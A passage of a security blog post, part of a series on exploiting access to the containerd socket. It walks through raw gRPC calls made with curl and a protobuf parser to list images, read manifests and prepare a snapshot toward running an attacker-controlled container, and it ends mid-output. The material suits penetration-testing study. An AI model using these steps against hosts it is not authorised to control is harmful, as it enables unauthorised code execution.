- Running our own containers with curl
- Find a suitable local container
- Get the container image identifier for this CPU architecture
- Get the snapshot overlayfs identifier for the container image
- Get details about the container image to use to create a container
- Create a snapshot to act as the containers filesystem
- Create the container
- Create and start a task
- Run a command in an existing container
- Delete a running container
This is the third and final part in my series on exploiting access to the containerd socket.
As a recap, in part 1, I covered the “easy” socket access exploitation method of using the ctr
tool to do things such as running your own containers and executing code in existing containers.
In part2, I covered the much more complicted curl
exploitation approach, by introducing how to parse the binary messages used by the containerd API, and showing “simple” examples of how to talk to the containerd socket using curl
.
In this part, I show the more complicated curl
examples, including how to run your own containers and how to run code in existing containers. As demonstrated in part 2, using curl
, while possible, is not exactly easy, and the examples only get more complicated in this post. To understand whats going on in this post below, you will need to be familiar with some of the content from the previous posts.
In particular:
- In part 1, I talked about containerd namespaces, and how the communication channels for container processes are not available through the API itself, but instead are routed through named pipe files in the host filesystem. The same concepts are in play here when we run our own containers or run additional code in existing containers.
- In part2, I talked about how you can identify the calls in the containerd API, how you can parse the binary messages used by the API, and how you can use
curl
to make the API calls. These same techniques are used in this post, and can be considered required knowledge for whats discussed below.
I will also note, that to run our own containers or to run a process in an existing container, we need to have write access to a section of the containerd’s host filesystem to create named pipe files for the process stdin, stdout and sterr channels. The reason for this was raised in part 1 in the section on executing code in containers here, so make sure there is such a location, even a temp directory, before proceeding.
Running our own containers with curl
Running our own containers involves the following steps:
- Find a suitable local container
- Get the container image identifier for this CPU architecture
- Get the snapshot overlayfs identifier for the container image
- Get details about the container image to use to create a container
- Create a snapshot to act as the containers filesystem
- Create the container
- Create and start a task
Find a suitable local container
As with the ctr
example from part 1, we want to list the local container images available locally first so we can identify an image to use for the container we want to run. The images protocol definition file can be used to view services relating to images.
An important thing to note here is that this is the first of the .proto files we have looked at so far that has a github based dependency, which you can see here.
The line looks like this:
import "github.com/containerd/containerd/api/types/descriptor.proto";
In this case, we want to download the dependency file individually, process it using protoc
(as discussed in part2), store the .proto file and the generated Python output in the present working directory, and change the import line as follows.
import "descriptor.proto";
Remember to do this for all future .proto files to make sure they will work correctly.
Once the images.proto
file is processed we can get the related list of API services:
$ ./protobuf_parser.py -m images_pb2.py
Services:
* /containerd.services.images.v1.Images/Get
Input: GetImageRequest
Output: GetImageResponse
* /containerd.services.images.v1.Images/List
Input: ListImagesRequest
Output: ListImagesResponse
* /containerd.services.images.v1.Images/Create
Input: CreateImageRequest
Output: CreateImageResponse
* /containerd.services.images.v1.Images/Update
Input: UpdateImageRequest
Output: UpdateImageResponse
* /containerd.services.images.v1.Images/Delete
Input: DeleteImageRequest
Output: Empty
==================================
[SNIP]
As we see from the above, the /containerd.services.images.v1.Images/List
operation involves sending ListImagesRequest
messages and getting ListImagesResponses
in response. The definition for thes ListImagesRequest
looks like the following:
* ListImagesRequest
Fields:
filters - string
Rough JSON example (might need tweaking):
{
"filters": "string"
}
As with a number of the message types we looked at in part2, the ListImagesRequest
message has a single input field filters
, which can be left empty if we want to list all images. This means we can use a empty message type as input. The following command shows how to list images in the k8s.io
namespace.
$ echo -ne "\x00\x00\x00\x00\x00" | sudo curl -v -s --http2-prior-knowledge --unix-socket /run/containerd/containerd.sock -X POST -H "content-type: application/grpc" -H "te: trailers" -H "grpc-accept-encoding: gzip" -H "containerd-namespace: k8s.io" http://localhost/containerd.services.images.v1.Images/List --data-binary @- --output listimagesresponse.bin
* Trying /run/containerd/containerd.sock:0...
* Connected to localhost (/run/containerd/containerd.sock) port 80 (#0)
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x55f7bd403ec0)
> POST /containerd.services.images.v1.Images/List HTTP/2
> Host: localhost
> user-agent: curl/7.81.0
> accept: */*
> content-type: application/grpc
> te: trailers
> grpc-accept-encoding: gzip
> containerd-namespace: k8s.io
> content-length: 5
>
} [5 bytes data]
* We are completely uploaded and fine
* Connection state changed (MAX_CONCURRENT_STREAMS == 4294967295)!
< HTTP/2 200
< content-type: application/grpc
<
{ [32727 bytes data]
< grpc-status: 0
< grpc-message:
* Connection #0 to host localhost left intact
The response in file listimagesresponse.bin
is a ListImagesResponse
, and we can parse it and check for nginx
images as we did in the ctr
example in part 1 like so:
$ ./protobuf_parser.py -m images_pb2.py -d listimagesresponse.bin -t ListImagesResponse | grep nginx
name: "docker.io/library/nginx:1.14.2"
name: "docker.io/library/nginx@sha256:32da30332506740a2f7c34d5dc70467b7f14ec67d912703568daff790ab3f755"
name: "docker.io/library/nginx@sha256:f7988fb6c02e0ce69257d9bd9cf37ae20a60f1df7563c3a2a6abe24160306b8d"
[SNIP]
We have the image identifier for our nginx image, which is docker.io/library/nginx:1.14.2
.
Get the container image identifier for this CPU architecture
Now we want to get the image details. From the previous services listing for the Image service above, we can see the /containerd.services.images.v1.Images/Get
operation involves sending GetImageRequest
messages and getting GetImageResponse
in response. The definitions for the GetImageRequest
looks as follows:
* GetImageRequest
Fields:
name - string
Rough JSON example (might need tweaking):
{
"name": "string"
}
In this case we actually need to send a protobuf message with some content in it. We can create one from a JSON template using the protobuf_parser.py tool like so.
$ cat getimage.json
{"name": "docker.io/library/nginx:1.14.2"}
$ ./protobuf_parser.py -m images_pb2.py -t GetImageRequest -i getimage.json -o /tmp/getimage.bin
Written to /tmp/getimage.bin
The message has been encoded into a protobuf binary format in file getimage.bin
. We can either read this directly from its file with curl
(shown below) or we could hexlify it and pipe it to curl using the echo command after encoding it (a tool to do this is available here if needed).
Here we make the curl
request reading the content from a file on disk.
$ sudo curl -s -v --http2-prior-knowledge --unix-socket /run/containerd/containerd.sock -X POST -H "content-type: application/grpc" -H "user-agent: grpc-go/1.59.0" -H "te: trailers" -H "containerd-namespace: k8s.io" http://localhost/containerd.services.images.v1.Images/Get --data-binary @getimage.bin --output getimageresponse.bin
* Trying /run/containerd/containerd.sock:0...
* Connected to localhost (/run/containerd/containerd.sock) port 80 (#0)
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x561c6e1d7eb0)
> POST /containerd.services.images.v1.Images/Get HTTP/2
> Host: localhost
> accept: */*
> content-type: application/grpc
> user-agent: grpc-go/1.59.0
> te: trailers
> containerd-namespace: k8s.io
> content-length: 37
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 4294967295)!
} [37 bytes data]
* We are completely uploaded and fine
< HTTP/2 200
< content-type: application/grpc
<
{ [242 bytes data]
< grpc-status: 0
< grpc-message:
* Connection #0 to host localhost left intact
The GetImageResponse
formated response is in file getimageresponse.bin
as created by curl in the command above. We can parse it like so.
$ ./protobuf_parser.py -m images_pb2.py -d getimageresponse.bin -t GetImageResponse
image {
name: "docker.io/library/nginx:1.14.2"
labels {
key: "io.cri-containerd.image"
value: "managed"
}
target {
media_type: "application/vnd.docker.distribution.manifest.list.v2+json"
digest: "sha256:f7988fb6c02e0ce69257d9bd9cf37ae20a60f1df7563c3a2a6abe24160306b8d"
size: 2029
}
created_at {
seconds: 1697590445
nanos: 454204347
}
updated_at {
seconds: 1697590450
nanos: 558546668
}
}
This gives us a manifest list for this image with an identifier of sha256:f7988fb6c02e0ce69257d9bd9cf37ae20a60f1df7563c3a2a6abe24160306b8d
and a size of 2029
, which we will use in the following step.
We next need to get some information about the content of the manifest list now, for which we can use the content protocol definition file.
The services associated with this API are as follows.
$ ./protobuf_parser.py -m content_pb2.py
Services:
* /containerd.services.content.v1.Content/Info
Input: InfoRequest
Output: InfoResponse
* /containerd.services.content.v1.Content/Update
Input: UpdateRequest
Output: UpdateResponse
* /containerd.services.content.v1.Content/List
Input: ListContentRequest
Output: ListContentResponse
* /containerd.services.content.v1.Content/Delete
Input: DeleteContentRequest
Output: Empty
* /containerd.services.content.v1.Content/Read
Input: ReadContentRequest
Output: ReadContentResponse
* /containerd.services.content.v1.Content/Status
Input: StatusRequest
Output: StatusResponse
* /containerd.services.content.v1.Content/ListStatuses
Input: ListStatusesRequest
Output: ListStatusesResponse
* /containerd.services.content.v1.Content/Write
Input: WriteContentRequest
Output: WriteContentResponse
* /containerd.services.content.v1.Content/Abort
Input: AbortRequest
Output: Empty
To get the content of the manifest list we are interested in the /containerd.services.content.v1.Content/Read
service, which uses the ReadContentRequest
and ReadContentResponse
messages. The ReadContentRequest
message looks as follows:
* ReadContentRequest
Fields:
digest - string
offset - int64
size - int64
Rough JSON example (might need tweaking):
{
"digest": "string",
"offset": int64,
"size": int64
}
We can create a request to get the content of the previously mentioned manifest list as follows:
$ cat readcontentrequest.json
{"digest": "sha256:f7988fb6c02e0ce69257d9bd9cf37ae20a60f1df7563c3a2a6abe24160306b8d", "size": 2029}
$ ./protobuf_parser.py -m content_pb2.py -t ReadContentRequest -i readcontentrequest.json -o readcontentrequest.bin
Written to readcontentrequest.bin
Send the request as follows:
$ sudo curl -s -v --http2-prior-knowledge --unix-socket /run/containerd/containerd.sock -X POST -H "content-type: application/grpc" -H "user-agent: grpc-go/1.59.0" -H "te: trailers" -H "containerd-namespace: k8s.io" http://localhost/containerd.services.content.v1.Content/Read --data-binary @readcontentrequest.bin --output readcontentresponse.bin
* Trying /run/containerd/containerd.sock:0...
* Connected to localhost (/run/containerd/containerd.sock) port 80 (#0)
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x55ec533d1eb0)
> POST /containerd.services.content.v1.Content/Read HTTP/2
> Host: localhost
> accept: */*
> content-type: application/grpc
> user-agent: grpc-go/1.59.0
> te: trailers
> containerd-namespace: k8s.io
> content-length: 81
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 4294967295)!
} [81 bytes data]
* We are completely uploaded and fine
< HTTP/2 200
< content-type: application/grpc
<
{ [2037 bytes data]
< grpc-status: 0
< grpc-message:
* Connection #0 to host localhost left intact
Parse the response as a ReadContentResponse
message:
$ ./protobuf_parser.py -m content_pb2.py -t ReadContentResponse -d readcontentresponse.bin
data: "{\n "schemaVersion": 2,\n "mediaType": "application/vnd.docker.distribution.manifest.list.v2+json",\n "manifests": [\n {\n "mediaType": "application/vnd.docker.distribution.manifest.v2+json",\n "size": 948,\n "digest": "sha256:706446e9c6667c0880d5da3f39c09a6c7d2114f5a5d6b74a2fafd24ae30d2078",\n "platform": {\n "architecture": "amd64",\n "os": "linux"\n }\n },\n {\n "mediaType": "application/vnd.docker.distribution.manifest.v2+json",\n "size": 948,\n "digest": "sha256:17a1998407746106c307c58c5089569bc1d0728567657b8c19ccffd0497c91ba",\n "platform": {\n "architecture": "arm",\n "os": "linux",\n "variant": "v7"\n }\n },\n {\n "mediaType": "application/vnd.docker.distribution.manifest.v2+json",\n "size": 948,\n "digest": "sha256:d58b3e481b8588c080b42e5d7427f2c2061decbf9194f06e2adce641822e282a",\n "platform": {\n "architecture": "arm64",\n "os": "linux",\n "variant": "v8"\n }\n },\n {\n "mediaType": "application/vnd.docker.distribution.manifest.v2+json",\n "size": 948,\n "digest": "sha256:de4556bb2971a581b6ce23bcbfd3dbef6ee1640839d2c88b3e846a4e101f363c",\n "platform": {\n "architecture": "386",\n "os": "linux"\n }\n },\n {\n "mediaType": "application/vnd.docker.distribution.manifest.v2+json",\n "size": 948,\n "digest": "sha256:750c35f5051eebd0d1a2faa08a29d3eabd330c8cf0350b57353d205a99c47176",\n "platform": {\n "architecture": "ppc64le",\n "os": "linux"\n }\n },\n {\n "mediaType": "application/vnd.docker.distribution.manifest.v2+json",\n "size": 948,\n "digest": "sha256:e76ff864168bca4ef1a53cfaf5fb4981cdb2810385b4b4edc19fd94a5d04eb38",\n "platform": {\n "architecture": "s390x",\n "os": "linux"\n }\n }\n ]\n}"
The response is a list of manifests. We want the one that matches the architecture of the current system which for this system is amd64
. Consequently, we want the manifest with identifier sha256:706446e9c6667c0880d5da3f39c09a6c7d2114f5a5d6b74a2fafd24ae30d2078
with size 948
. We now craft up another ReadContentRequest
request message to get the container image details from this manifest.
$ cat readcontentrequest2.json
{"digest": "sha256:706446e9c6667c0880d5da3f39c09a6c7d2114f5a5d6b74a2fafd24ae30d2078", "size": 948}
$ ./protobuf_parser.py -m content_pb2.py -t ReadContentRequest -i readcontentrequest2.json -o readcontentrequest2.bin
Written to readcontentrequest2.bin
Send the request.
$ sudo curl -s -v --http2-prior-knowledge --unix-socket /run/containerd/containerd.sock -X POST -H "content-type: application/grpc" -H "user-agent: grpc-go/1.59.0" -H "te: trailers" -H "containerd-namespace: k8s.io" http://localhost/containerd.services.content.v1.Content/Read --data-binary @readcontentrequest2.bin --output readcontentresponse2.bin
* Trying /run/containerd/containerd.sock:0...
* Connected to localhost (/run/containerd/containerd.sock) port 80 (#0)
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x562fb0428eb0)
> POST /containerd.services.content.v1.Content/Read HTTP/2
> Host: localhost
> accept: */*
> content-type: application/grpc
> user-agent: grpc-go/1.59.0
> te: trailers
> containerd-namespace: k8s.io
> content-length: 81
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 4294967295)!
} [81 bytes data]
* We are completely uploaded and fine
< HTTP/2 200
< content-type: application/grpc
<
{ [956 bytes data]
< grpc-status: 0
< grpc-message:
* Connection #0 to host localhost left intact
Parse the response to get the details of the manifest.
$ ./protobuf_parser.py -m content_pb2.py -t ReadContentResponse -d readcontentresponse2.bin
data: "{\n "schemaVersion": 2,\n "mediaType": "application/vnd.docker.distribution.manifest.v2+json",\n "config": {\n "mediaType": "application/vnd.docker.container.image.v1+json",\n "size": 6003,\n "digest": "sha256:295c7be079025306c4f1d65997fcf7adb411c88f139ad1d34b537164aa060369"\n },\n "layers": [\n {\n "mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",\n "size": 22496048,\n "digest": "sha256:27833a3ba0a545deda33bb01eaf95a14d05d43bf30bce9267d92d17f069fe897"\n },\n {\n "mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",\n "size": 22204973,\n "digest": "sha256:0f23e58bd0b7c74311703e20c21c690a6847e62240ed456f8821f4c067d3659b"\n },\n {\n "mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",\n "size": 203,\n "digest": "sha256:8ca774778e858d3f97d9ec1bec1de879ac5e10096856dc22ed325a3ad944f78a"\n }\n ]\n}"
From this response we want to get details of the container image. It has this identifier sha256:295c7be079025306c4f1d65997fcf7adb411c88f139ad1d34b537164aa060369
and a size of 6003
.
Get the snapshot overlayfs identifier for the container image
We now need to do an /containerd.services.content.v1.Content/Info
request to get the snapshot uid for this container. This API call uses the InfoRequest
and InfoResponse
messages. The InfoRequest
looks as follows:
* InfoRequest
Fields:
digest - string
Rough JSON example (might need tweaking):
{
"digest": "string"
}
Lets create an InfoRequest
request for the container image we identified above.
$ cat inforequest.json
{"digest": "sha256:295c7be079025306c4f1d65997fcf7adb411c88f139ad1d34b537164aa060369"}
$ ./protobuf_parser.py -m content_pb2.py -t InfoRequest -i inforequest.json -o inforequest.bin
Written to inforequest.bin
Now send the request.
$ sudo curl -s -v --http2-prior-knowledge --unix-socket /run/containerd/containerd.sock -X POST -H "content-type: application/grpc" -H "user-agent: grpc-go/1.59.0" -H "te: trailers" -H "containerd-namespace: k8s.io" http://localhost/containerd.services.content.v1.Content/Info --data-binary @inforequest.bin --output inforesponse.bin
* Trying /run/containerd/containerd.sock:0...
* Connected to localhost (/run/containerd/containerd.sock) port 80 (#0)
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x55ca70ebaeb0)
> POST /containerd.services.content.v1.Content/Info HTTP/2
> Host: localhost
> accept: */*
> content-type: application/grpc
> user-agent: grpc-go/1.59.0
> te: trailers
> containerd-namespace: k8s.io
> content-length: 78
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 4294967295)!
} [78 bytes data]
* We are completely uploaded and fine
< HTTP/2 200
< content-type: application/grpc
<
{ [290 bytes data]
< grpc-status: 0
< grpc-message:
* Connection #0 to host localhost left intact
Now lets parse the response so we can get the snapshot overlay details.
$ ./protobuf_parser.py -m content_pb2.py -t InfoResponse -d inforesponse.bin
info {
digest: "sha256:295c7be079025306c4f1d65997fcf7adb411c88f139ad1d34b537164aa060369"
size: 6003
created_at {
seconds: 1697590436
nanos: 851140635
}
updated_at {
seconds: 1697590450
nanos: 555865938
}
labels {
key: "containerd.io/gc.ref.snapshot.overlayfs"
value: "sha256:19606512dfe192788a55d7c1efb9ec02041b4e318587632f755c5112f927e0e3"
}
labels {
key: "containerd.io/distribution.source.docker.io"
value: "library/nginx"
}
}
From the above, the identifier of the overlay snapshot identifier is sha256:19606512dfe192788a55d7c1efb9ec02041b4e318587632f755c5112f927e0e3
. We will use this later to create a overlayfs filesystem snapshot for the container to use.
Get details about the container image to use to create a container
We also want to get some details about the image itself for use when we create the container - we can do this using the /containerd.services.content.v1.Content/Read
API call, which uses ReadContentRequest
and ReadContentResponse
messages.
The ReadContentRequest
message looks like the following:
* ReadContentRequest
Fields:
digest - string
offset - int64
size - int64
Rough JSON example (might need tweaking):
{
"digest": "string",
"offset": int64,
"size": int64
}
Lets create one of these messages to get details about the container image.
$ cat readcontentrequest.json
{"digest": "sha256:295c7be079025306c4f1d65997fcf7adb411c88f139ad1d34b537164aa060369", "size": 6003}
$ ./protobuf_parser.py -m content_pb2.py -i readcontentrequest.json -o readcontentrequest.bin -t ReadContentRequest
Written to readcontentrequest.bin
Make the request.
$ sudo curl -s -v --http2-prior-knowledge --unix-socket /run/containerd/containerd.sock -X POST -H "content-type: application/grpc" -H "user-agent: grpc-go/1.59.0" -H "te: trailers" -H "containerd-namespace: k8s.io" http://localhost/containerd.services.content.v1.Content/Read --data-binary @readcontentrequest.bin --output readcontentresponse.bin
* Trying /run/containerd/containerd.sock:0...
* Connected to localhost (/run/containerd/containerd.sock) port 80 (#0)
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x5594f4dd9eb0)
> POST /containerd.services.content.v1.Content/Read HTTP/2
> Host: localhost
> accept: */*
> content-type: application/grpc
> user-agent: grpc-go/1.59.0
> te: trailers
> containerd-namespace: k8s.io
> content-length: 81
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 4294967295)!
} [81 bytes data]
* We are completely uploaded and fine
< HTTP/2 200
< content-type: application/grpc
<
{ [6011 bytes data]
< grpc-status: 0
< grpc-message:
* Connection #0 to host localhost left intact
Now lets look at the response to get details of the container image.
$ ./protobuf_parser.py -m content_pb2.py -d readcontentresponse.bin -t ReadContentResponse
data: "{"architecture":"amd64","config":{"Hostname":"","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":{"80/tcp":{}},"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin","NGINX_VERSION=1.14.2-1~stretch","NJS_VERSION=1.14.2.0.2.6-1~stretch"],"Cmd":["nginx","-g","daemon off;"],"ArgsEscaped":true,"Image":"sha256:ac539667b75fa925232b8dbbfdfb8adb98007c44e11a5fbd4001916c0fcc0bd4","Volumes":null,"WorkingDir":"","Entrypoint":null,"OnBuild":null,"Labels":{"maintainer":"NGINX Docker Maintainers \[email protected]\u003e"},"StopSignal":"SIGTERM"},"container":"5e8d96e0fb01832974f0680a9aff2fbadc37fcf30447ae30e19f59b926672041","container_config":{"Hostname":"5e8d96e0fb01","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":{"80/tcp":{}},"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin","NGINX_VERSION=1.14.2-1~stretch","NJS_VERSION=1.14.2.0.2.6-1~stretch"],"Cmd":["/bin/sh","-c","#(nop) ","CMD [\"nginx\" \"-g\" \"daemon off;\"]"],"ArgsEscaped":true,"Image":"sha256:ac539667b75fa925232b8dbbfdfb8adb98007c44e11a5fbd4001916c0fcc0bd4","Volumes":null,"WorkingDir":"","Entrypoint":null,"OnBuild":null,"Labels":{"maintainer":"NGINX Docker Maintainers \[email protected]\u003e"},"StopSignal":"SIGTERM"},"created":"2019-03-26T23:14:52.227945051Z","docker_version":"18.06.1-ce","history":[{"created":"2019-03-26T22:41:26.106246179Z","created_by":"/bin/sh -c #(nop) ADD file:4fc310c0cb879c876c5c0f571af665a0d24d36cb9263e0f53b0cda2f7e4b1844 in / "},{"created":"2019-03-26T22:41:26.302497847Z","created_by":"/bin/sh -c #(nop) CMD [\"bash\"]","empty_layer":true},{"created":"2019-03-26T23:13:16.970741082Z","created_by":"/bin/sh -c #(nop) LABEL maintainer=NGINX Docker Maintainers \[email protected]\u003e","empty_layer":true},{"created":"2019-03-26T23:14:26.130250839Z","created_by":"/bin/sh -c #(nop) ENV NGINX_VERSION=1.14.2-1~stretch","empty_layer":true},{"created":"2019-03-26T23:14:26.292539689Z","created_by":"/bin/sh -c #(nop) ENV NJS_VERSION=1.14.2.0.2.6-1~stretch","empty_layer":true},{"created":"2019-03-26T23:14:50.851725507Z","created_by":"/bin/sh -c set -x \t\u0026\u0026 apt-get update \t\u0026\u0026 apt-get install --no-install-recommends --no-install-suggests -y gnupg1 apt-transport-https ca-certificates \t\u0026\u0026 \tNGINX_GPGKEY=573BFD6B3D8FBC641079A6ABABF5BD827BD9BF62; \tfound=''; \tfor server in \t\tha.pool.sks-keyservers.net \t\thkp://keyserver.ubuntu.com:80 \t\thkp://p80.pool.sks-keyservers.net:80 \t\tpgp.mit.edu \t; do \t\techo \"Fetching GPG key $NGINX_GPGKEY from $server\"; \t\tapt-key adv --keyserver \"$server\" --keyserver-options timeout=10 --recv-keys \"$NGINX_GPGKEY\" \u0026\u0026 found=yes \u0026\u0026 break; \tdone; \ttest -z \"$found\" \u0026\u0026 echo \u003e\u00262 \"error: failed to fetch GPG key $NGINX_GPGKEY\" \u0026\u0026 exit 1; \tapt-get remove --purge --auto-remove -y gnupg1 \u0026\u0026 rm -rf /var/lib/apt/lists/* \t\u0026\u0026 dpkgArch=\"$(dpkg --print-architecture)\" \t\u0026\u0026 nginxPackages=\" \t\tnginx=${NGINX_VERSION} \t\tnginx-module-xslt=${NGINX_VERSION} \t\tnginx-module-geoip=${NGINX_VERSION} \t\tnginx-module-image-filter=${NGINX_VERSION} \t\tnginx-module-njs=${NJS_VERSION} \t\" \t\u0026\u0026 case \"$dpkgArch\" in \t\tamd64|i386) \t\t\techo \"deb https://nginx.org/packages/debian/ stretch nginx\" \u003e\u003e /etc/apt/sources.list.d/nginx.list \t\t\t\u0026\u0026 apt-get update \t\t\t;; \t\t*) \t\t\techo \"deb-src https://nginx.org/packages/debian/ stretch nginx\" \u003e\u003e /etc/apt/sources.list.d/nginx.list \t\t\t\t\t\t\u0026\u0026 tempDir=\"$(mktemp -d)\" \t\t\t\u0026\u0026 chmod 777 \"$tempDir\" \t\t\t\t\t\t\u0026\u0026 savedAptMark=\"$(apt-mark showmanual)\" \t\t\t\t\t\t\u0026\u0026 apt-get update \t\t\t\u0026\u0026 apt-get build-dep -y $nginxPackages \t\t\t\u0026\u0026 ( \t\t\t\tcd \"$tempDir\" \t\t\t\t\u0026\u0026 DEB_BUILD_OPTIONS=\"nocheck parallel=$(nproc)\" \t\t\t\t\tapt-get source --compile $nginxPackages \t\t\t) \t\t\t\t\t\t\u0026\u0026 apt-mark showmanual | xargs apt-mark auto \u003e /dev/null \t\t\t\u0026\u0026 { [ -z \"$savedAptMark\" ] || apt-mark manual $savedAptMark; } \t\t\t\t\t\t\u0026\u0026 ls -lAFh \"$tempDir\" \t\t\t\u0026\u0026 ( cd \"$tempDir\" \u0026\u0026 dpkg-scanpackages . \u003e Packages ) \t\t\t\u0026\u0026 grep '^Package: ' \"$tempDir/Packages\" \t\t\t\u0026\u0026 echo \"deb [ trusted=yes ] file://$tempDir ./\" \u003e /etc/apt/sources.list.d/temp.list \t\t\t\u0026\u0026 apt-get -o Acquire::GzipIndexes=false update \t\t\t;; \tesac \t\t\u0026\u0026 apt-get install --no-install-recommends --no-install-suggests -y \t\t\t\t\t\t$nginxPackages \t\t\t\t\t\tgettext-base \t\u0026\u0026 apt-get remove --purge --auto-remove -y apt-transport-https ca-certificates \u0026\u0026 rm -rf /var/lib/apt/lists/* /etc/apt/sources.list.d/nginx.list \t\t\u0026\u0026 if [ -n \"$tempDir\" ]; then \t\tapt-get purge -y --auto-remove \t\t\u0026\u0026 rm -rf \"$tempDir\" /etc/apt/sources.list.d/temp.list; \tfi"},{"created":"2019-03-26T23:14:51.711682497Z","created_by":"/bin/sh -c ln -sf /dev/stdout /var/log/nginx/access.log \t\u0026\u0026 ln -sf /dev/stderr /var/log/nginx/error.log"},{"created":"2019-03-26T23:14:51.894981136Z","created_by":"/bin/sh -c #(nop) EXPOSE 80","empty_layer":true},{"created":"2019-03-26T23:14:52.059858592Z","created_by":"/bin/sh -c #(nop) STOPSIGNAL SIGTERM","empty_layer":true},{"created":"2019-03-26T23:14:52.227945051Z","created_by":"/bin/sh -c #(nop) CMD [\"nginx\" \"-g\" \"daemon off;\"]","empty_layer":true}],"os":"linux","rootfs":{"type":"layers","diff_ids":["sha256:5dacd731af1b0386ead06c8b1feff9f65d9e0bdfec032d2cd0bc03690698feda","sha256:b8f18c3b860b067be09836beadd676a0aa1e784ec28cf730986859b4146c344a","sha256:82ae01d5004e2143b642b1a008624e7521c73ab18e5776a22f18a172b9dbec80"]}}"
Theres is information here that we will use when we create our container spec. args
from the Cmd
value and env
from Env
and some label values.
Create a snapshot to act as the containers filesystem
Now, using this, we need to create a snapshot for the containers storage . The snapshot protocol definition file can be used to view services relating to snapshots. It has a dependency on the mount.proto definition so make sure you process this first as previously discussed.
These are the services supported in the protocol definition:
$ ./protobuf_parser.py -m snapshots_pb2.py
Services:
* /containerd.services.snapshots.v1.Snapshots/Prepare
Input: PrepareSnapshotRequest
Output: PrepareSnapshotResponse
* /containerd.services.snapshots.v1.Snapshots/View
Input: ViewSnapshotRequest
Output: ViewSnapshotResponse
* /containerd.services.snapshots.v1.Snapshots/Mounts
Input: MountsRequest
Output: MountsResponse
* /containerd.services.snapshots.v1.Snapshots/Commit
Input: CommitSnapshotRequest
Output: Empty
* /containerd.services.snapshots.v1.Snapshots/Remove
Input: RemoveSnapshotRequest
Output: Empty
* /containerd.services.snapshots.v1.Snapshots/Stat
Input: StatSnapshotRequest
Output: StatSnapshotResponse
* /containerd.services.snapshots.v1.Snapshots/Update
Input: UpdateSnapshotRequest
Output: UpdateSnapshotResponse
* /containerd.services.snapshots.v1.Snapshots/List
Input: ListSnapshotsRequest
Output: ListSnapshotsResponse
* /containerd.services.snapshots.v1.Snapshots/Usage
Input: UsageRequest
Output: UsageResponse
* /containerd.services.snapshots.v1.Snapshots/Cleanup
Input: CleanupRequest
Output: Empty
We want to create a snapshot, for which we use the /containerd.services.snapshots.v1.Snapshots/Prepare
API call, which uses the PrepareSnapshotRequest
and PrepareSnapshotResponse
messages.
The PrepareSnapshotRequest
message looks as follows:
* PrepareSnapshotRequest
Fields:
snapshotter - string
key - string
parent - string
labels - LabelsEntry
Rough JSON example (might need tweaking):
{
"snapshotter": "string",
"key": "string",
"parent": "string",
"labels": LabelsEntry
}
Create a snapshot request like so:
$ cat preparesnapshotrequest.json
{"snapshotter": "overlayfs", "key": "nginx", "parent": "sha256:19606512dfe192788a55d7c1efb9ec02041b4e318587632f755c5112f927e0e3"}
$ ./protobuf_parser.py -m snapshots_pb2.py -i preparesnapshotrequest.json -o preparesnapshotrequest.bin -t PrepareSnapshotRequest
Written to preparesnapshotrequest.bin
Send the request
$ sudo curl -s -v --http2-prior-knowledge --unix-socket /run/containerd/containerd.sock -X POST -H "content-type: application/grpc" -H "user-agent: grpc-go/1.59.0" -H "te: trailers" -H "containerd-namespace: k8s.io" http://localhost/containerd.services.snapshots.v1.Snapshots/Prepare --data-binary @preparesnapshotrequest.bin --output preparesnapshotresponse.bin
* Trying /run/containerd/containerd.sock:0...
* Connected to localhost (/run/containerd/containerd.sock) port 80 (#0)
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x55faed8d7eb0)
> POST /containerd.services.snapshots.v1.Snapshots/Prepare HTTP/2
> Host: localhost
> accept: */*
> content-type: application/grpc
> user-agent: grpc-go/1.59.0
> te: trailers
> containerd-namespace: k8s.io
> content-length: 96
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 4294967295)!
} [96 bytes data]
* We are completely uploaded and fine
< HTTP/2 200
< content-type: application/grpc
<
{ [453 bytes data]
< grpc-status: 0
< grpc-message:
* Connection #0 to host localhost left intact
Now lets parse the response:
$ ./protobuf_parser.py -m snapshots_pb2.py -t PrepareSnapshotResponse -d preparesnapshotresponse.bin
mounts {
type: "overlay"
source: "overlay"
options: "index=off"
options: "workdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/45575/work"
options: "upperdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/45575/fs"
